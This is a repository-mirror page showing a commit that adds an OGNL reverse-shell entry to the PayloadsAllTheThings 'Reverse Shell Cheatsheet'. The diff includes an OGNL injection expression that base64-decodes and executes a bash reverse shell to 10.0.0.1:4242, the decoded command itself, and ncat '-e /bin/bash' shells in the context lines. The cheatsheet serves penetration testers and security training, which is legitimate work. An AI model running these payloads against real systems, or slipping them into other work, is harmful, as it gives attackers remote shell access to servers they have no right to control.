ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-12-19 19:06:12 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Merge pull request #704 from therealtoastycat/patch-1

Browse Source 
Adding reverse shell payload for OGNL
This commit is contained in:
Swissky 2024-01-05 15:45:19 +01:00 committed by GitHub
commit 4b77292aeb
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 9 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

9
Methodology and Resources/Reverse Shell Cheatsheet.md
View File

@ -22,6 +22,7 @@
* [Netcat BusyBox](#netcat-busybox) * [Netcat BusyBox](#netcat-busybox)
* [Netcat Traditional](#netcat-traditional) * [Netcat Traditional](#netcat-traditional)
* [NodeJS](#nodejs) * [NodeJS](#nodejs)
* [OGNL](#ognl)
* [OpenSSL](#openssl) * [OpenSSL](#openssl)
* [Perl](#perl) * [Perl](#perl)
* [PHP](#php) * [PHP](#php)
@ -252,6 +253,14 @@ ncat 10.0.0.1 4242 -e /bin/bash
ncat --udp 10.0.0.1 4242 -e /bin/bash ncat --udp 10.0.0.1 4242 -e /bin/bash
``` ```
### OGNL
```java
(#a='echo YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80MjQyIDA+JjEnCg== | base64 -d | bash -i').(#b={'bash','-c',#a}).(#p=new java.lang.ProcessBuilder(#b)).(#process=#p.start())
```
With `YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80MjQyIDA+JjEnCg==` decoding to `bash -c 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1'`, the payload within the single quotes might be changed by any Linux-compatible reverse shell.
### OpenSSL ### OpenSSL
Attacker: Attacker: